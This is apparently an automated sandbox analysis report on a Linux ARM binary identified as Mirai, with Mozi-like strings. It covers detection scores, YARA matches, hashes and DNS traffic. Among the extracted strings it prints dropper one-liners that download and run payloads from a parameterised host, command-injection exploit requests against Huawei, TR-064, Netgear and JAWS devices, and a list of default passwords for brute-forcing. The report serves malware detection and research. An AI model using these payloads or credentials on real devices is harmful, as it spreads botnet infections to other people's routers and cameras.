Edit tour

Linux Analysis Report
i.elf

Overview

General Information

Sample name:i.elf
Analysis ID:1649766
MD5:4a37f9bc8c92d81ed42a3c2497bef23a
SHA1:9b75f57abb15af98dbe384129cb2db54f30f0b89
SHA256:f1adaf586f1161019f7fbe285cf73d4ebecb94b9fef9ba306831b54e89e6f764
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:100
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1649766
Start date and time:2025-03-27 03:44:25 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:i.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@2/0
Command:/tmp/i.elf
PID:5434
Exit Code:135
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • i.elf (PID: 5434, Parent: 5356, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/i.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
i.elfJoeSecurity_Mirai_4Yara detected MiraiJoe Security
    i.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      i.elfJoeSecurity_Mirai_5Yara detected MiraiJoe Security
        i.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          i.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            5434.1.00007f43d4060000.00007f43d406a000.rw-.sdmpJoeSecurity_Mirai_4Yara detected MiraiJoe Security
              5434.1.00007f43d4060000.00007f43d406a000.rw-.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
                5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                  5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmpJoeSecurity_Mirai_5Yara detected MiraiJoe Security
                    5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                      Click to see the 6 entries
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: i.elfAvira: detected
                      Source: i.elfReversingLabs: Detection: 58%
                      Source: i.elfVirustotal: Detection: 68%Perma Link
                      Source: i.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                      Source: i.elfString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                      Source: i.elfString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                      Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                      Source: i.elfString found in binary or memory: http://%s:%d/Mozi.a;chmod
                      Source: i.elfString found in binary or memory: http://%s:%d/Mozi.a;sh$
                      Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m
                      Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m;
                      Source: i.elfString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                      Source: i.elfString found in binary or memory: http://%s:%d/bin.sh
                      Source: i.elfString found in binary or memory: http://%s:%d/bin.sh;chmod
                      Source: i.elfString found in binary or memory: http://127.0.0.1
                      Source: i.elfString found in binary or memory: http://127.0.0.1sendcmd
                      Source: i.elfString found in binary or memory: http://HTTP/1.1
                      Source: i.elfString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                      Source: i.elfString found in binary or memory: http://ipinfo.io/ip
                      Source: i.elfString found in binary or memory: http://purenetworks.com/HNAP1/
                      Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: i.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//

                      System Summary

                      barindex
                      Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                      Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                      Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                      Source: 5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                      Source: 5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                      Source: 5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                      Source: Initial sampleString containing 'busybox' found: busybox
                      Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/ls|more
                      Source: Initial sampleString containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
                      Source: Initial sampleString containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
                      Source: Initial sampleString containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                      Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                      Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                      Source: Initial sampleString containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
                      Source: Initial sampleString containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
                      Source: Initial sampleString containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
                      Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                      Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                      Source: Initial sampleString containing potential weak password found: admin
                      Source: Initial sampleString containing potential weak password found: default
                      Source: Initial sampleString containing potential weak password found: support
                      Source: Initial sampleString containing potential weak password found: service
                      Source: Initial sampleString containing potential weak password found: supervisor
                      Source: Initial sampleString containing potential weak password found: guest
                      Source: Initial sampleString containing potential weak password found: administrator
                      Source: Initial sampleString containing potential weak password found: 123456
                      Source: Initial sampleString containing potential weak password found: 54321
                      Source: Initial sampleString containing potential weak password found: password
                      Source: Initial sampleString containing potential weak password found: 12345
                      Source: Initial sampleString containing potential weak password found: admin1234
                      Source: Initial samplePotential command found: GET /c HTTP/1.0
                      Source: Initial samplePotential command found: GET %s HTTP/1.1
                      Source: Initial samplePotential command found: GET /c
                      Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                      Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                      Source: Initial samplePotential command found: GET /%s HTTP/1.1
                      Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                      Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                      Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                      Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                      Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                      Source: i.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                      Source: 5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                      Source: 5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                      Source: 5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                      Source: classification engineClassification label: mal100.troj.linELF@0/0@2/0
                      Source: /tmp/i.elf (PID: 5434)Queries kernel information via 'uname': Jump to behavior
                      Source: i.elf, 5434.1.0000559a07525000.0000559a07631000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
                      Source: i.elf, 5434.1.00007ffde2f13000.00007ffde2f34000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/i.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/i.elf
                      Source: i.elf, 5434.1.0000559a07525000.0000559a07631000.rw-.sdmpBinary or memory string: Urg.qemu.gdb.arm.sys.regs">
                      Source: i.elf, 5434.1.0000559a07525000.0000559a07631000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                      Source: i.elf, 5434.1.00007ffde2f13000.00007ffde2f34000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                      Source: i.elf, 5434.1.0000559a07525000.0000559a07631000.rw-.sdmpBinary or memory string: rg.qemu.gdb.arm.sys.regs">

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: i.elf, type: SAMPLE
                      Source: Yara matchFile source: 5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5434.1.00007f43d4060000.00007f43d406a000.rw-.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: i.elf PID: 5434, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: i.elf, type: SAMPLE
                      Source: Yara matchFile source: 5434.1.00007f43d4017000.00007f43d4058000.r-x.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5434.1.00007f43d4060000.00007f43d406a000.rw-.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: i.elf PID: 5434, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts1
                      Command and Scripting Interpreter
                      1
                      Scripting
                      Path InterceptionDirect Volume Access1
                      Brute Force
                      11
                      Security Software Discovery
                      Remote ServicesData from Local System1
                      Non-Application Layer Protocol
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                      Application Layer Protocol
                      Exfiltration Over BluetoothNetwork Denial of Service
                      No configs have been found
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Number of created Files
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649766 Sample: i.elf Startdate: 27/03/2025 Architecture: LINUX Score: 100 8 daisy.ubuntu.com 2->8 10 Malicious sample detected (through community Yara rule) 2->10 12 Antivirus / Scanner detection for submitted sample 2->12 14 Multi AV Scanner detection for submitted file 2->14 16 Yara detected Mirai 2->16 6 i.elf 2->6         started        signatures3 process4

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      i.elf58%ReversingLabsLinux.Trojan.Mirai
                      i.elf68%VirustotalBrowse
                      i.elf100%AviraEXP/ELF.Mirai.O
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches

                      Download Network PCAP: filteredfull

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      daisy.ubuntu.com
                      162.213.35.25
                      truefalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://%s:%d/bin.sh;chmodi.elffalse
                          high
                          http://ipinfo.io/ipi.elffalse
                            high
                            http://%s:%d/Mozi.a;chmodi.elffalse
                              high
                              http://%s:%d/Mozi.m;/tmp/Mozi.mi.elffalse
                                high
                                http://schemas.xmlsoap.org/soap/encoding/i.elffalse
                                  high
                                  http://%s:%d/bin.shi.elffalse
                                    high
                                    http://purenetworks.com/HNAP1/i.elffalse
                                      high
                                      http://%s:%d/Mozi.m;i.elffalse
                                        high
                                        http://schemas.xmlsoap.org/soap/envelope/i.elffalse
                                          high
                                          http://HTTP/1.1i.elffalse
                                            high
                                            http://%s:%d/Mozi.a;sh$i.elffalse
                                              high
                                              http://127.0.0.1i.elffalse
                                                high
                                                http://baidu.com/%s/%s/%d/%s/%s/%s/%s)i.elffalse
                                                  high
                                                  http://schemas.xmlsoap.org/soap/envelope//i.elffalse
                                                    high
                                                    http://%s:%d/Mozi.mi.elffalse
                                                      high
                                                      http://127.0.0.1sendcmdi.elffalse
                                                        high
                                                        No contacted IP infos
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        daisy.ubuntu.commorte.spc.elfGet hashmaliciousUnknownBrowse
                                                        • 162.213.35.25
                                                        efjepc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 162.213.35.25
                                                        morte.arm6.elfGet hashmaliciousUnknownBrowse
                                                        • 162.213.35.25
                                                        spc.elfGet hashmaliciousOkiruBrowse
                                                        • 162.213.35.24
                                                        resgod.ppc.elfGet hashmaliciousMiraiBrowse
                                                        • 162.213.35.24
                                                        x64.elfGet hashmaliciousGafgyt, OkiruBrowse
                                                        • 162.213.35.24
                                                        resgod.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 162.213.35.25
                                                        resgod.m68k.elfGet hashmaliciousMiraiBrowse
                                                        • 162.213.35.24
                                                        resgod.sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 162.213.35.25
                                                        hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        • 162.213.35.24
                                                        No context
                                                        No context
                                                        No context
                                                        No created / dropped files found
                                                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, missing section headers at 307920
                                                        Entropy (8bit):5.976386447617361
                                                        TrID:
                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                        File name:i.elf
                                                        File size:291'312 bytes
                                                        MD5:4a37f9bc8c92d81ed42a3c2497bef23a
                                                        SHA1:9b75f57abb15af98dbe384129cb2db54f30f0b89
                                                        SHA256:f1adaf586f1161019f7fbe285cf73d4ebecb94b9fef9ba306831b54e89e6f764
                                                        SHA512:5c4c4f9d1202de2b60559280de0fede0b761403a0c48e373f0b2bd69f5a224b84daef9e0fdd5aa1639805fa444cae106bdcd7a155f57692738d0bc55dcccc9b5
                                                        SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                        TLSH:49543A8AFD81AE25D5C1267BFE2F428A331317B8D2EB71129D145F2876CA94F0F3A541
                                                        File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                        Download Network PCAP: filteredfull

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 27, 2025 03:45:16.331202030 CET3737353192.168.2.138.8.8.8
                                                        Mar 27, 2025 03:45:16.331250906 CET3585553192.168.2.138.8.8.8
                                                        Mar 27, 2025 03:45:16.419578075 CET53358558.8.8.8192.168.2.13
                                                        Mar 27, 2025 03:45:16.419631958 CET53373738.8.8.8192.168.2.13
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 27, 2025 03:45:16.331202030 CET192.168.2.138.8.8.80x7defStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                        Mar 27, 2025 03:45:16.331250906 CET192.168.2.138.8.8.80xdb3dStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 27, 2025 03:45:16.419631958 CET8.8.8.8192.168.2.130x7defNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                        Mar 27, 2025 03:45:16.419631958 CET8.8.8.8192.168.2.130x7defNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                                        System Behavior

                                                        Start time (UTC):02:45:13
                                                        Start date (UTC):27/03/2025
                                                        Path:/tmp/i.elf
                                                        Arguments:/tmp/i.elf
                                                        File size:4956856 bytes
                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1